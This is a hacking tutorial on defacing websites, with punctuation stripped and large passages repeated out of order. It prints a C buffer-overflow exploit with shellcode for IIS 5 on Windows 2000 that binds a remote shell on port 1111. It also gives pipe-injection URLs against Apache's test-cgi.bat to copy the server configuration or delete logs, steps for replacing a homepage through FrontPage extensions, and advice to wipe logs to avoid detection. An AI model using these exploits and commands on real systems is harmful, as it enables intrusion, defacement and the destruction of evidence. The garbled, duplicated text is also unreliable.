x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 9
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
